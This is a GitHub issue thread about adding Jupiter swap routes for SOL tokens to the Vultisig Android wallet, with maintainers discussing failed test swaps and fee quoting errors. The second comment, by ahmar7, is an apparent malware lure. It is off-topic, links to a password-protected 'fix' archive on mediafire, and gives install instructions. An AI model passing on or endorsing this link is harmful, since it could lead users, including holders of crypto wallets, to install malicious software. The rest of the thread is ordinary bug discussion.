### ISSUE TITLE
ADD: SOL Jupiter Swap routes

### ISSUE THREAD

**Issue by realpaaao** [vultisig/vultisig-android#834]
To be able to swap SOL tokens please integrate Jupiter swaps according to their [docs](https://station.jup.ag/docs/api).

Please also add 50 bps fees.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by realpaaao** [comment]
@aminsato We need to improve the swapping experience some more before we can implement it:

- [ ] Sometimes quoting very high swap fees, which will just produce an invalid swap+hash: 

![Image](https://github.com/user-attachments/assets/86055ef0-6a98-4fcc-ae51-de722ebb6bfc)

- [ ] Swap fail of `Incorrect input parameter`: 

![Image](https://github.com/user-attachments/assets/9406f10c-7bc8-4a12-a384-b853ddedfd97)

- [ ] Swap fail `custom programm error`:

![Image](https://github.com/user-attachments/assets/c20168bb-7b46-4de3-9ffd-51d81e632df7)

I made two succesful swaps with JUP to SOL but failed 4 more swaps. Can you verify and include the succefuls swaps after fixing?

**Comment by aminsato** [comment]
@realpaaao 
I'll check

**Comment by aminsato** [comment]
@realpaaao 
Do you know the source and destination tokens for the failed swaps?

**Comment by realpaaao** [comment]
@aminsato different tokens. Didn't appear to be a specific token where it fails...
